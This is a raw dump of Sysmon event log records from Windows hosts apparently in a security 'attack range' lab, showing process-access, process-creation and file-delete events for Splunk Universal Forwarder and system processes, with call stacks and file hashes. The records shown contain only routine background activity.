--ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000287264Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:19.754{C8EA50B7-10F3-6216-FA04-000000003802}43565812C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287263Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:19.457{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-10F3-6216-FA04-000000003802}4356C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287262Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:19.457{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287261Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:19.457{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287260Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:19.457{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287259Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:19.457{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287258Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:19.457{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-10F3-6216-FA04-000000003802}4356C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287257Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:19.457{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-10F3-6216-FA04-000000003802}4356C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287256Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:19.458{C8EA50B7-10F3-6216-FA04-000000003802}4356C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287255Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:19.207{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF86B3ABF2D34B641B47DF73B1246F81,SHA256=51D6EAACCC6A4AA1DBA6973C466F252B90C42161340917CEF72E047CE0468944,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287291Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:20.973{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-10F4-6216-FD04-000000003802}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287290Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:20.973{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287289Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:20.973{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287288Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:20.973{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287287Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:20.973{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287286Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:20.973{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-10F4-6216-FD04-000000003802}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287285Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:20.973{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-10F4-6216-FD04-000000003802}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287284Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:20.974{C8EA50B7-10F4-6216-FD04-000000003802}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000287283Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:20.691{C8EA50B7-10F4-6216-FC04-000000003802}3005824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287282Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:20.457{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-10F4-6216-FC04-000000003802}300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287281Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:20.457{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287280Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:20.457{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287279Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:20.457{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287278Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:20.457{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287277Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:20.457{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-10F4-6216-FC04-000000003802}300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287276Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:20.457{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-10F4-6216-FC04-000000003802}300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287275Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:20.458{C8EA50B7-10F4-6216-FC04-000000003802}300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287274Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:20.254{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DFA7556F49C2A3D28C8667754DAB214,SHA256=D124B19153AB333C7B53FEF0BEFA282DE7C582793974CDB6466CCCBA98E10043,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216215Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:20.030{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 